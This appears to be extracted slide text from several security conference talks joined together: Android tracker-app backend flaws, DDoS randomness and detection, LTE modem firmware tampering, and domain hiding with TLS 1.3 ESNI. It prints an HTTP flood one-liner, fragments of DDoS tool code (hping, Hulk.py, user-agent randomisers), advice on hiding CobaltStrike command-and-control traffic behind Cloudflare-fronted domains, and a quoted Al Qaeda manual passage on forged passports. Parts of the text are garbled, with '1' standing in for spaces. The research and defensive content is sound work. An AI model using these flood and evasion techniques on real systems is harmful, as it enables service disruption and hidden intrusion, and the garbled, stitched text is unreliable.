PasswordActivity.this.util.toast("Password Wrong"); } But there is More HTTP/1.112001OK {1… user_email=foo@bar.com user_name=theuser user_password=123456 user_token=cQfgiDRWx9o:APA91bGTkU1N9F... user_type=1 .. } public void onDataChange(DataSnapshot dataSnapshot) { PasswordActivity.this.util.log("userid password123", "" + dataSnapshot.getValue()); if(PasswordActivity.get_string_from_edittext(PasswordActivity.ed_password).compareToIgnoreCase( dataSnapshot.getValue().toString()) == 0) { .... PasswordActivity.this.save_user_data(); return; } PasswordActivity.lDialog.dismiss(); PasswordActivity.this.util.toast("Password Wrong"); } Sh** happens What‘s wrong ? § Misconfiguration of Firebase,1no authorisation rules What‘s wrong ? § Misconfiguration of Firebase,1no authorisation rules § User1authentication is done on1app (client)Qside § User1authentication must be done on1server side What‘s wrong ? § Misconfiguration of Firebase,1no authorisation rules § User1authentication is done on1app (client)Qside § User1authentication must be done on1server side § Provider1Backend1must handle1the authentication process for the firebase storage or even better use Firebase API* *https://firebase.google.com/docs/auth/ What‘s wrong ? § Misconfiguration of Firebase,1no authorisation rules § User1authentication is done on1app (client)Qside § User1authentication must1be done on1server side § Provider1Backend1must1handle1the authentication process for the firebase storage or even better use Firebase API* § Worst case,1if1you1submit1the1parent1URL1without the1concrete1user1 ID,1you1get1all1the1data1=>1firebase1misconfiguration *https://firebase.google.com/docs/auth/ Agenda 162 § Introduction/Motivation § Background Information § Bad Client-Side Checks with SharedPreferences § Client-Side and Communication Vulnerabilities § Server-Side Vulnerabilities § Responsible Disclosure Process § Summary Responsible Disclosure § Announced1vendors,1901days1to1fix1the1bugs1 § Reactions: § A1few:1“We1will1fix1it” § No1reaction § “How1much1money1do1you1want”1 § “It’s1not1a1bug,1it’s1a1feature” Responsible Disclosure § Announced1vendors,1901days1to1fix1the1bugs1 § Reactions: § A1few:1“We1will1fix1it” § No1reaction § “How1much1money1do1you1want”1 § “It’s1not1a1bug,1it’s1a1feature” § Announced1to1Google1Android1Security1and1to1ASI1(app1security1 improvement)Team1->1no1direct1reaction Responsible Disclosure § Announced1vendors,1901days1to1fix1the1bugs1 § Reactions: § A1few:1“We1will1fix1it” § No1reaction § “How1much1money1do1you1want”1 § “It’s1not1a1bug,1it’s1a1feature” § Announced1to1Google1Android1Security1and1to1ASI1(app1security1 improvement)Team1->1no1direct1reaction § Some1apps1removed1from1play1store1(121of119)1 § Still1vulnerable1backends and1apps1in1the1store Responsible Disclosure § Announced1vendors,1901days1to1fix1the1bugs1 § Reactions: § A1few:1“We1will1fix1it” § No1reaction § “How1much1money1do1you1want”1 § “It’s1not1a1bug,1it’s1a1feature” § Announced1to1Google1Android1Security1and1to1ASI1(app1security1 improvement)Team1->1no1direct1reaction § Some1apps1removed1from1play1store1(121of119)1 § Still1vulnerable1backends and1apps1in1the1store § Some1app1are1detected1as1malware1(e.g.1Firefox1download1blocker) Recommendations § DON‘T1use1plaintext1communication1in1mobile1!1 Recommendations § DON‘T1use1plaintext1communication1in1mobile1!1 § Use1prepared1statements1(in1correct1way1J)1to1avoid1SQL1injection Recommendations § DON‘T1use1plaintext1communication1in1mobile1!1 § Use1prepared1statements1(in1correct1way1J)1to1avoid1SQL1injection § App1security1is1important1but1consider1also1back1end1security Recommendations § DON‘T1use1plaintext1communication1in1mobile1!1 § Use1prepared1statements1(in1correct1way1J)1to1avoid1SQL1injection § App1security1is1important1but1consider1also1back1end1security § DON’T1store1any1user1secrets1in1the1app1(client1side) *https://firebase.google.com/docs/auth/ Recommendations § DON‘T1use1plaintext1communication1in1mobile1!1 § Use1prepared1statements1(in1correct1way1J)1to1avoid1SQL1injection § App1security1is1important1but1consider1also1back1end1security § DON’T1store1any1user1secrets1in1the1app1(client1side) § If1you1provide1premium1or1payment1feature,1do1verification1on1server1 § Authentication1and1authorization1for1backend1data (e.g.1firebase*) *https://firebase.google.com/docs/auth/ Agenda 172 § Introduction/Motivation § Background Information § Bad Client-Side Checks with SharedPreferences § Client-Side and Communication Vulnerabilities § Server-Side Vulnerabilities § Responsible Disclosure Process § Summary 173 Client-SideQVulnerability DirectQData Breach My1Family1GPS1Tracker1 X KidControll GPS1Tracker X Family1Locator1(GPS) X X Free1Cell1Tracker X X Rastreador de1Novia 1 X X Rastreador de1Novia 2 X X Phone1Tracker1Free X X Phone1Tracker1Pro X X Rastrear Celular Por el1Numero X X Localizador de1Celular GPS X X Rastreador de1Celular Avanzado X X Handy1Orten per1Handynr X X Localiser un1Portable1avec1son1Numero X X Phone1Tracker1By1Number X X Track1My1Family X X Couple1Vow X Real1Time1GPS1Tracker X Couple1Tracker1App X Ilocatemobile X 174 175 176 177 178 179 180 181 SiegfriedQRasthofer Email:1siegfried.rasthofer@sit.fraunhofer.de Web:1www.rasthofer.info StephanQHuber Email:1stephan.huber@sit.fraunhofer.de Twitter:1@teamsik Website:1www.team-sik.org
pdf
Take advantage of randomness Frank Tse Nexusguard Agenda What is random Some applications of random Detecting anomalies from randomness Mitigating ‘random’ attacks 1 2 3 4 Visualizing randomness 5 About::me From Hong Kong Researcher in DDoS I like RFC IT Security Identify them correctly Take actions accordingly Block the known bad Verify the known good Track the uncertain Challenge the suspicious DDoS: Good Human > Adult, Kid, Infant Bad Human > Smart, not-so-smart Good Bot (inhuman) Bad bot (inhuman) General IT security vs DDoS /dev/random Entropy: initial seeds for random number generation kern.random.sys.seeded non-blocking while reading kern.random.sys.harvest.ethernet LAN traffic kern.random.sys.harvest.point_to_point P2P interface kern.random.sys.harvest.interrupt HW interrupt (Mouse, keyboard) kern.random.sys.harvest.swi SW interrupt (exceptions) Initializing seed for random during boot up (HW) Entropy: initial seeds for random number generation If I’m running on VM [ 0.000000] Booting paravirtualized kernel on KVM virtio-rng: a driver for feeding entropy between VM guest and host Problem: I don’t trust virto-rng Solution: entropy from remote server entropy.ubuntu.com Angers Bridge, collapsed on Apr-16, 1850, due to soldiers marching across it. aka. “Stuck in synchronization” 2009 MAY 19, Storm Codec [ Baofeng] (暴风影音) brings down DNSpod. Due to lack of random back-off and sleep mechanism Routing protocol randomized hello timers to avoid ‘stuck in synchronization” RFC4271 – Border Gateway Protocol v4 To minimize the likelihood that the distribution of BGP messages by a given BGP speaker will contain peaks, jitter SHOULD be applied to the timers associated with MinASOriginationIntervalTimer, KeepaliveTimer, MinRouteAdvertisementIntervalTimer, and ConnectRetryTimer. A given BGP speaker MAY apply the same jitter to each of these quantities, regardless of the destinations to which the updates are being sent; that is, jitter need not be configured on a per-peer basis. The suggested default amount of jitter SHALL be determined by multiplying the base value of the appropriate timer by a random factor, which is uniformly distributed in the range from 0.75 to 1.0. A new random value SHOULD be picked each time the timer is set. The range of the jitter's random value MAY be configurable. C&C Communication Software update check Generating Randomart from SSH host key fingerprint $ ssh root@myhost -o VisualHostKey=yes Host key fingerprint is ce:7f:ee:de:c0:87:bb:63:8b:ae:d3:6d:08:4d:d4:8f +--[ RSA 2048]----+ | . | | . . | | . o | | . E . | | So | | o. .. . | | oo o+ . | | ..o.*= | | .++BB+. | +-----------------+ Without randomness CVE-2008-1447: DNS Cache Poisoning Issue allow remote attackers to spoof DNS traffic via a birthday attack that uses in-bailiwick referrals to conduct cache poisoning against recursive resolvers, related to insufficient randomness of DNS transaction IDs and source ports, aka "DNS Insufficient Socket Entropy Vulnerability" or "the Kaminsky bug." Without randomness TCP Reset attacks / predictable TCP source port The easiest way to implement ‘random TCP src port’ is counter++ OSX keep TCP source port++ for each new request, same as Windows How online services support random password Ideal Random password Alphanumeric + limited special chars + Password policy Alphanumeric + limited special chars Alphanumeric Numeric only Phone compatible services Variants by languages & site owners Lazy administrators Variants by languages & site owners, + Totally insane RANDOM randomness policy DDoS attacks – the art of evasion Attack goes undetected is getting harder 0-days on protocol are getting harder to dig out Detections are implementing closer to bots Security awareness increased by site owners DDoS tools are mostly open sources Signatures of DDoS tools can be easily implemented Websites are behind mitigation filters or CDNs A successful DDoS attacks is Make as many false possible as possible Detection and mitigation filter never trigger Real server believes it is from a legitimate user Level 0.0 – Bandwidth attacks 100% stateless, even initiated in TCP 99.99% chance of being block since the port is not open 99% chance of being block from source Your botnet may disconnect from command updates Level 0.1 – Bandwidth attacks 100% stateless, mostly works with UDP Attack power relies on intermediate victim servers Attack efficiency relies on amplification factor It’s easy to detect, and it’s from fixed source port J Reflected Normal Traffic Attack traffic Src port Src port Dst port Dst port Level 1.0 – TCP SYN Flood 100% stateless 99.99% using spoof IP 99% complies with RFC but not exists in real world RFC 793 (TCP) is 33 years old Ø  it didn’t say what you should not spoof Ø  it didn’t say what TCP ACK you should pick during TCP handshake Ø  It didn’t say how many TCP Options you should include during handshake Level 1.0 – TCP SYN Flood Sendtcp.c (hping3-20051105) /* sequence number and ack are random if not set */ tcp->th_seq = (set_seqnum) ? htonl(tcp_seqnum) : htonl(rand()); tcp->th_ack = (set_ack) ? htonl(tcp_ack) : htonl(rand()); sequence++; /* next sequence number */ if (!opt_keepstill) src_port = (sequence + initsport) % 65536; Main.c /* set initial source port */ if (initsport == -1) initsport = src_port = 1024 + (rand() % 2000); It’s easy to spot HPING from source port and non-zero tcp_ack # Level 1.0 – TCP SYN Flood Randomness detection can be based on COMBINATION of fields Insane packet can be dropped: tcp.flags == 0x02 && (ip.len – 40)%4 !=0 Level 2.0 – HTTP GET Flood - static for ((i=0;i<100;i++)) do `wget target.com &`; done It’s is legitimate but it’s dummy and static it’s HTTP/1.0 lack of HTTP headers Distribution of requests are spectrum like not as random as expected How to mitigate block tcp.flags == 0x18 and ip.len < 100 and tcp.dstport == 80 Level 2.1 – HTTP GET Flood – static random GET / HTTP/1.1 Host: www.nexusguard.com Connection: keep-alive Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.65 Safari/537.31 Referer: https://www.facebook.com/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 This is legitimate request Level 2.1 – HTTP GET Flood – static random GET / HTTP/1.1 Host: www.nexusguard.com Connection: keep-alive Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: $VARIABLE Referer: https://www.facebook.com/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 This is how attacker try to variety Hulk.py #builds random ascii string def buildblock(size): out_str = ’’ for i in range(0, size): a = random.randint(65, 90) out_str += chr(a) return(out_str) Level 2.1 – HTTP GET Flood – static random Hulk.py # generates a user agent array def useragent_list(): global headers_useragents headers_useragents.append('Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/ 20090913 Firefox/3.5.3’) headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)’) headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)’) headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1’) headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/ 532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1’) headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)’) headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/ 4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)’) headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)’) headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/ 4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)’) headers_useragents.append('Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)’) headers_useragents.append('Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)’) headers_useragents.append('Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51') return(headers_useragents) Level 2.1 – HTTP GET Flood – static random DirtJumper v5 User Agent selector Level 2.2 – HTTP GET Flood – dynamic random #http request def httpcall(url): request = urllib2.Request(url + param_joiner + buildblock(random.randint(3,10)) + '=' + buildblock(random.randint(3,10))) request.add_header('User-Agent', random.choice(headers_useragents)) request.add_header('Cache-Control', 'no-cache’) request.add_header('Accept-Charset', 'ISO-8859-1,utf-8;q=0.7,*;q=0.7’) request.add_header('Referer', random.choice(headers_referers) + buildblock(random.randint(5,10))) request.add_header('Keep-Alive', random.randint(110,120)) request.add_header('Connection', 'keep-alive’) request.add_header('Host',host) Don’t do unreasonable random for the sake of randomness confusion Normal HTTP keep-alive range doesn’t fall in this range Level 2.2 – HTTP GET Flood – dynamic random Uagent.php // random user-agent generator function nt_version() return rand(5, 6) . '.' . rand(0, 1); function ie_version() // IE return rand(7, 9) . '.0’; function osx_version() // need to add support for OSX10.10 J return "10_" . rand(5, 7) . '_' . rand(0, 9); function chrome_version() return rand(13, 15) . '.0.' . rand(800, 899) . '.0'; Hint: Predict next version by time (build-in script) Level 2.2 – HTTP GET Flood – dynamic random Uagent.php // random user-agent generator function firefox($arch) { $ver = array_random(array( 'Gecko/' . date('Ymd', rand(strtotime('2011-1-1'), time())) . ' Firefox/' . rand(5, 7) . '.0’, 'Gecko/' . date('Ymd', rand(strtotime('2011-1-1'), time())) . ' Firefox/' . rand(5, 7) . '.0.1’, 'Gecko/' . date('Ymd', rand(strtotime('2010-1-1'), time())) . ' Firefox/3.6.' . rand(1, 20), 'Gecko/' . date('Ymd', rand(strtotime('2010-1-1'), time())) . ' Firefox/3.8’ )); switch ($arch) { // firefox for Linux, Mac and Win with different processers case 'lin’: return "(X11; Linux {proc}; rv:" . rand(5, 7) . ".0) $ver"; case 'mac': $osx = osx_version(); return "(Macintosh; {proc} Mac OS X $osx rv:" . rand(2, 6) . ".0) $ver »; case 'win’: default: $nt = nt_version(); return "(Windows NT $nt; {lang}; rv:1.9." . rand(0, 2) . ".20) $ver »; } } Level 2.3 – HTTP GET Flood – smart random User-agents are not randomly distributed 0% 20% 40% 60% 80% 100% 2002 2004 2006 2008 2010 2012 2014 Others IE Firefox/Mozilla Chrome 0% 20% 40% 60% 80% 100% Legitimate UA distribution by year Attack UA distribution by year Level 2.3 – HTTP GET Flood – smart random User-agents are not randomly distribute function chooseRandomBrowserAndOS() { $frequencies = array( 34 => array( 89 => array('chrome', 'win'), 9 => array('chrome', 'mac'), 2 => array('chrome', 'lin’) ), 32 => array( 100 => array('iexplorer', 'win’)), 25 => array( 83 => array('firefox', 'win'), 16 => array('firefox', 'mac'), 1 => array('firefox', 'lin’)), 7 => array( 95 => array('safari', 'mac'), 4 => array('safari', 'win'), 1 => array('safari', 'lin’)), 2 => array( 91 => array('opera', 'win'), 6 => array('opera', 'lin'), 3 => array('opera', 'mac’)) ); Level 2.3 – HTTP GET Flood – dynamic random 100% predictable URL and parameter 100% predictable HTTP header order 99% purely randomize in pre-defined character space ADDRESS ORDERS MATTERS - because RFC2616 HTTP/1.1 only specific required headers, not orders - implementation of HTTP header order is depending on OS - Orders can be normalized / corrected by CDN, thank you CDN J CHARACTER SPACE MATTERS -  Pure random is easy to be detected -  Attack character space didn’t fit with distribution of normal request Level 3.0 – HTTP GET Flood – emulated random Al Qaeda Handbook - The Manchester Manual Lesson 3 Forged Documents (Identity Cards, Records Books, Passports) Forged Documents (Identity Cards, Records Books, Passports) The following security precautions should be taken: 1. Keeping the passport in a safe place so it would not be ceized by the security apparatus, and the brother it belongs to would have to negotiate its return (I’ll give you your passport if you give me information) 2. All documents of the undercover brother, such as identity cards and passport, should be falsified. 3. When the undercover brother is traveling with a certain identity card or passport, he should know all pertinent [information] such as the name, profession, and place of residence. Use Proxy X-forwarded-IP X-Client-IP Always spoof User-agent Behave and react as claimed, real UA Level 3.0 – HTTP GET Flood – emulated random 4. The brother who has special work status (commander, communication link, ...) should have more than one identity card and passport. He should learn the contents of each, the nature of the [indicated] profession, and the dialect of the residence area listed in the document. 5. The photograph of the brother in these documents should be without a beard. It is preferable that the brother’s public photograph [on these documents] be also without a beard. If he already has one [document] showing a photograph with a beard, he should replace it. 6. When using an identity document in different names, no more than one such document should be carried at one time. Use anonymous proxy Use anonymous network (TOR) Never use real IP to send C&C command or send attack Don’t send too much traffic from a single machine Level 3.0 – HTTP GET Flood – emulated random Now attacks are emulating from real users, with Ø  Low request rate Ø  From normally distributed source IP (GEO-IP) Ø  Totally valid TCP and IP headers Ø  Legitimate user-agents Ø  Legitimate user-agents with up-to-date distribution Ø  Correct HTTP headers and orders Level 3.0 – HTTP GET Flood – emulated random p0f Passive, progressive, layered validation Level 3.0 – HTTP GET Flood – emulated random behavior Progressive, application specific challenge, Level 3.0 – HTTP GET Flood – emulated random Level BOSS – DDoS the legitimate client Attacker knows your clients’ IPs Attacker knows your detection policies Attacker knows your mitigation filters Attacker can launch ‘targeted’ DDoS by spoofing legitimate client Proudly Present “APT Style” DDoS Level BOSS – DDoS the legitimate client False Positive False Negative A + B = Constant Level BOSS – DDoS the legitimate client OR Draw this fractal with 2 lines of code Max. string 200 One of the acceptable sample output: bhvbhdjmnnmbfjnfghjbnvghvbv Questions? Contact me via ‘random’ e-mail above
pdf
This talk is not about LTE vulnerabilities No cables Why isn’t it working? Scared Poopless – LTE and *your* laptop Disclaimer: During the slides you will be exposed to hacker stock photos from the internet. Thank you! Goldy aSmig @octosavvi Intel Security would like to acknowledge and thank the Huawei PSIRT team for their responsiveness and cooperation on this issue. • CVE-2015-5367: Insecure Linux Image in Firmware • CVE-2015-5368: Insecure Firmware Update Authentication http://huawei.com/en/security/psirt/security- bulletins/security-advisories/hw-446601.htm DEMO What did I just see? This is not a problem Remember kids! This is why you should do secure firmware updates NEVER FORGET Adam Caudill Brandon Wilson Who are we? @jessemichael @laplinker Background • Internal LTE/3G modems and who uses them? I like to use my own keyboard • Internal LTE/3G modems and who uses them? • Business class devices I think I have an idea! • Internal LTE/3G modems and who uses them? • Business class devices • How is it plugged in anyway? Card against humanity 2015 world champion • Internal LTE/3G modems and who uses them? • Business class devices • How is it plugged in anyway? • Internal LTE/3G modems and who uses them? • Business class devices • How is it plugged in anyway? PCIe ×2, SATA, USB 2.0 and 3.0, Audio, PCM, IUM, SSIC and I2C I forgot mac’s don’t have a CD drive anymore • Internal LTE/3G modems and who uses them? • Business class devices • How is it plugged in anyway? • USB?! Crap! I just stabbed my usb thumb drive! • Internal LTE/3G modems and who uses them? • Business class devices • How is it plugged in? • USB?! • Why hack this device anyway? Respect the gas/ski mask Background • Internal LTE/3G modems and who uses them? • Business class devices • How is it plugged in? • USB?! • Why hack this device anyway? • Module available worldwide • It’s plugged in [INSIDE] your laptop/tablet • Software • Firmware • Hardware • Software • Windows utility for firmware updates • Firmware • Hardware • Software • Windows utility for firmware updates • Firmware • Packed in software utility • Hardware Low-cost anonymity • Software • Windows utility for firmware updates • Firmware • Strings is useful • Hardware What do you mean you can see my face? • Software • Windows utility for firmware updates • Firmware • Strings is useful • Hardware • Test pads? • Software • Windows utility for firmware updates • Firmware • Strings is useful • Hardware • Test pads? Got root shell! Happy shell dance Obligatory success meme • We have root shell on a linux run, independent device inside the physical platform. There is someone behind me isn’t there? Firmware structure 92-byte file header 98-byte object header dword at offset 0x5E: object block size word at offset 0x5C: object header CRC dword at offset 0x18: object data size data block 0 word at offset 0x00: data block 0 CRC word at offset 0x02: data block 1 CRC word at offset N*2: data block N CRC data block N data block 1 98-byte object header dword at offset 0x5E: object block size word at offset 0x5C: object header CRC dword at offset 0x18: object data size data block 0 word at offset 0x00: data block 0 CRC word at offset 0x02: data block 1 CRC word at offset N*2: data block N CRC data block N data block 1 Data size relationships CRC value/data correspondence Creeper hacker Updater patch • Updater checks CRC • Updater calculates the correct CRC and compares to the one in the firmware image • Modify updater code to save correct CRC in image instead of comparing it • Total op code change = 6 (not including NOP padding) How do I laptop? Summary • We had a cool demo! • There is such a thing as an insider threat, literally. • Secure your firmware updates. Questions?
pdf
Domain Fronting is Dead, Long Live Domain Fronting Using TLS 1.3 to evade censors, bypass network defenses, and blend in with the noise Erik Hunstad Outline 0 Domain Fronting 101 ● If you wish to make an apple pie from scratch, you must first invent the universe ● To understand Domain Fronting, you must first understand HTTP over TLS (aka HTTPS) ● Server Name Indication (SNI) allows multiple sites to be hosted on the same IP ● TLS 1.3 enables encrypted certificates and encrypted Server Name Identification (ESNI) ● DNS over TLS or HTTPS + TLS 1.3 = domain fronting 2.0 or “domain hiding” HTTP Basics ● First, a user requests the IP of a server via DNS ● This is an unencrypted packet sent to UDP port 53 HTTP Basics ● The DNS server responds with an IP address ● The response is also unencrypted HTTP Basics ● The user sends a GET request, using the domain in the “Host” header ● TCP port 80 - unencrypted HTTP Basics ● The server responds with HTML content HTTP Basics ● Obviously bad because nothing is encrypted ● Both the DNS and HTTP request and response are in plaintext HTTP Basics ● Obviously bad because nothing is encrypted ● Both the DNS and HTTP request and response are in plaintext HTTPS Basics ● Starts off the same way, a user requests the IP of a server via DNS ● This is an unencrypted connection on UDP port 53 HTTPS Basics ● The DNS server responds with an IP address ● The response is also unencrypted HTTPS Basics ● The user sends a ClientHello to start the TLS handshake ● Server uses the “server_name” field (plaintext) to lookup how to respond HTTPS Basics ● The server responds with a certificate (in plaintext unless TLS 1.3) and completes the handshake ● All data after the handshake is encrypted HTTPS Basics ● Much better than HTTP ● Entire DNS process and the certificate exchange process are still unencrypted HTTPS Basics ● Much better than HTTP ● Entire DNS process and the certificate exchange process are still unencrypted Domain Fronting ● Circumvent censorship by obfuscating the domain of an HTTPS connection ● Connect to an approved server, but send an HTTP request for the actual destination ● Uses a hosting service to host the true destination - false destination must be on the same service ○ Google App Engine ○ Amazon S3/CloudFront ○ Microsoft Azure CDN ○ Others Domain Fronting ● DNS lookup as before for any site hosted by the hosting service ● Client and Server handshake as usual Domain Fronting ● Client and Server handshake as usual Domain Fronting ● Client sends an HTTP request with the Host header set to the actual destination ● The CDN forwards the request as long as the destination is hosted by the service ○ Any site on GAE could be used to front for an otherwise censored GAE server Domain Fronting ● Like a letter delivered to a house with multiple residents ● The mailman can see the address on the outside ● Letter on the inside goes to the correct person Domain Fronting ● April 2018 - The music stops ● Google ○ “Domain fronting has never been a supported feature at Google”1 ● Amazon ○ Implemented “Enhanced Domain Protections” ○ “no customer ever wants to find that someone else is masquerading as their innocent, ordinary domain”2 ○ Think of the innocent children ordinary domains! ● Cloudflare ○ Only HTTP works ● Azure ○ Still works... For now [1] A Google update just created a big problem for anti-censorship tools [2] Enhanced Domain Protections for Amazon CloudFront Requests Domain Fronting - Issues ● Major providers shut it down ● Limited fronting options ○ Only sites hosted on the same provider can be used to front ● Must host an “app” or have an account with the provider ○ Not free ■ Bandwidth ■ CPU time ○ Complex sign up requirements ■ Identity checks ■ Phone required ■ Credit card required 1 The Growth of TLS 1.3 31.7% The Growth of TLS 1.3 59% DNS - Fixing the Problem ● What if you wrap a DNS request in TLS? ● How about HTTPS? (RFC 8484) ● "The unmitigated usage of encrypted DNS, particularly DNS over HTTPS, could allow attackers and insiders to bypass organizational controls." - SANS3 ○ Great! [3] A New Needle and Haystack: Detecting DNS over HTTPS Usage TLS 1.3 and ESNI ● Now that DNS is encrypted, it can be used to fetch a public key before an HTTPS connection is started ● Classic Diffie-Hellman key exchange to symmetrically encrypt the server_name ○ All data required is sent in a single Client Hello (the client’s public key + extras) TLS 1.3 and ESNI - Step by Step ● Client requests the IP address and ESNI public key via DNS over TLS or HTTPS TLS 1.3 and ESNI - Step by Step ● DNS server returns the IP address and ESNI public key via DNS over TLS or HTTPS ● Cloudflare rotates their key every ~1 hour (with a few hours of buffer allowed by the servers) TLS 1.3 and ESNI - Step by Step ● Client sends a TLS 1.3 ClientHello with an encrypted_server_name extension TLS 1.3 and ESNI - Step by Step ● Web server responds with a ServerHello that includes the encrypted certificate TLS 1.3 and ESNI - Weak Spots ● DNS response for IP or _esni could be tampered with (poisoned resolver cache) ● DNSSEC!4 [4] How DNSSEC Works TLS 1.3 and ESNI - Weak Spots ● DNS over TLS or HTTPS is completely blocked ● Preload ESNI keys to bootstrap the connection TLS 1.3 and ESNI - Weak Spots ● The TLS connection goes to an IP address ● An IP may be shared by many domains, but may not ● Is there a generally applicable way to route to any domain via any other? ○ No, but how close can we get? Domain Hiding and DNS - Issues Issue Solution DNS is unencrypted DNS over TLS or HTTPS DNS is untrustworthy DNSSEC Encrypted DNS is blocked Bootstrap ESNI keys SNI is unencrypted ESNI IPs (or IPs that domains resolve to) are blocked Domain hiding with the largest CDN! 2 Cloudflare ● Founded in 2009 ● Content Delivery Network (CDN) ○ Highest number of internet exchange points of any network ○ Largest CDN in the world ○ Supports TLS 1.3, ESNI, Websockets, and QUIC ● Authoritative DNS ○ Over 26,000,000 domains ○ Supports DNSSEC Domain Hiding with Cloudflare ● A TLS 1.3 connection with ESNI is sent to ANY Cloudflare server ○ SNI can be included as well - does not have to match ESNI value ● A HTTP request is sent using that connection can have any Host header ○ True domain must have DNS provided by Cloudflare ● Cloudflare will forward the request to the true destination - just like domain fronting! ● Robin Wood (@digininja) was the first to show this was possible Noctilucent ● Go (Golang) rewrite of crypto/tls based on Cloudflare’s tls-tris project ● TLS 1.3 support ○ Config options specific for domain hiding ■ ESNIServerName - does not need to match the SNI extension or Host header ■ PreserveSNI - Allows the sending of a ClientHello with both SNI and ESNI extensions ● Drop in replacement for standard crypto/tls - backwards compatible ● Test client application ○ Attempts DNS over HTTPS (DoH) - Falls back to DNS over TLS, then system default DNS ○ Allows command line tuning of nearly every part of the TLS and HTTP connection ○ HTTPS and Websocket support ○ Cross platform! Normal HTTPS Connection TLS 1.3 + ESNI HTTPS Connection Hidden Request (no SNI) Fronted Request (with SNI) So what? ● Any domain protected by Cloudflare is able to arbitrarily front to any IP ○ Target IP can be hosted anywhere ○ DNS must be run via Cloudflare ● Cloudflare Managed DNS is free ● Signup requirements? ○ Email (disposable is ok) ○ Password ○ That's it! What Can You Hide With? ● Source: Alexa top 100,000 domains ● HTTPS GET request looking for cloudflare cookies, Expect-CT header, or Server ● Results: ○ At least 21% of the top 100,000 domains are available to front (21,298) ○ A few examples: ■ myshopify.com ■ medium.com ■ discordapp.com (on the PA whitelist)5 ■ udemy.com ■ zendesk.com ■ coinbase.com (on the PA whitelist)5 ■ hdfcbank.com ■ mozilla.org (on the PA whitelist)5 ■ teamviewer.com ■ blackboard.com ■ okta.com ■ bitdefender.com ■ ny.gov ■ mlb.com ■ stanford.edu ■ plex.tv ■ coronavirus.gov.hk ■ So much porn... [5] List of Domains and Applications Excluded from SSL Decryption Just doing some Single Sign On... SNI Based Web Filters ● Many products only look at SNI ○ ESNI completely ignored ● By preserving the SNI along with ESNI, filters and analytics can be tricked ● Example: Untangle ○ Installed with strict web filter settings Fooling SNI based Firewalls Fooling SNI based Firewalls HTTPS Decrypting Firewalls ● Seen in enterprise environments ○ Install a root certificate on endpoints ○ Break and re-encrypt traffic that passes through ○ Corporate Man-in-the-Middle ● Allows analysis of full packet data! ● Kazakhstan attempted this nation-wide in July 20196 ● Does TLS 1.3/ESNI offer a way around these firewalls? [6] Kazakhstan government is now intercepting all HTTPS traffic HTTPS Decrypting Firewalls ● Palo Alto PA-VM 10.0.0 ○ Released 2020-06-17 ○ Major new feature: TLS 1.3 decryption ○ Default decryption profile does not include TLS 1.3! ■ Allows TLS 1.3 to pass with an error [Palo Alto bypass via Mozilla fronting] What Else? ● Many connections to a fronted site may be suspicious ○ What protocols can we use? ■ HTTP ✅ ■ Websockets ✅ ■ Arbitrary TCP/UDP via a helper ✅ Fronting Streaming data with Websockets [Cloak Demo] [Cloak+CobaltStrike Demo] [DeimosC2 Demo] 3 What is Blue to Do? ● Disable TLS 1.3 (25-50% of traffic) ● Block Cloudflare (26 million domains)? ● Block ClientHellos with an encrypted_server_name extension? ○ Technically possible ○ Netsweeper >=6.4.1 (2020-02-25) can block all ESNI traffic ■ Cannot categorize sites ■ All or none ○ No other vendors currently support ESNI blocking as of today What is Blue to Do? ● Flag on ClientHello packets with both “server_name” and “encrypted_server_name” ○ Snort ■ Possible with custom rules? ■ ssl_state:client_hello ■ tls.version can narrow down to 1.3 ■ SNI extension type is 0x0000 ■ ESNI extension type is 0xffce ○ Securicata ■ Snort with extra features ■ has tls.sni but no tls.esni What is Blue to Do? ● “Good old fashioned police work” ○ Beaconing detection and anomaly network analytics ■ RITA or BeaKer (or fancy AI/ML) ■ How much should a user interact with a site? How often? How much data? ○ JA3 and JA3S mismatches ■ Should svchost.exe have a JA3 fingerprint of Go? ■ Cloak and utls are working to defeat this ○ Well instrumented EDR, application whitelisting, etc ■ Don’t get pwned in the first place! ■ “Server administrators should never allow untrusted code to run on the server” -Microsoft Domain Hiding - Noctilucent - The Future ● Latest advancement in censorship resistant communication ● Useable today ○ Go - drop in replacement ○ Cloak fork - use with anything that can be proxied (CobaltStrike, etc) ● Will be harder to block as TLS 1.3 and ESNI adoption grows ● ESNI RFC is in flux (last updated 2020-06-01) - might break tomorrow ○ Actually called ECH as of May 2020 ● Currently relies on a single (massive) CDN ○ Cloudflare please don’t break this ● Blue Team: Your move! References/Resources ● A New Needle and Haystack: Detecting DNS over HTTPS Usage ● Wikipedia: Domain 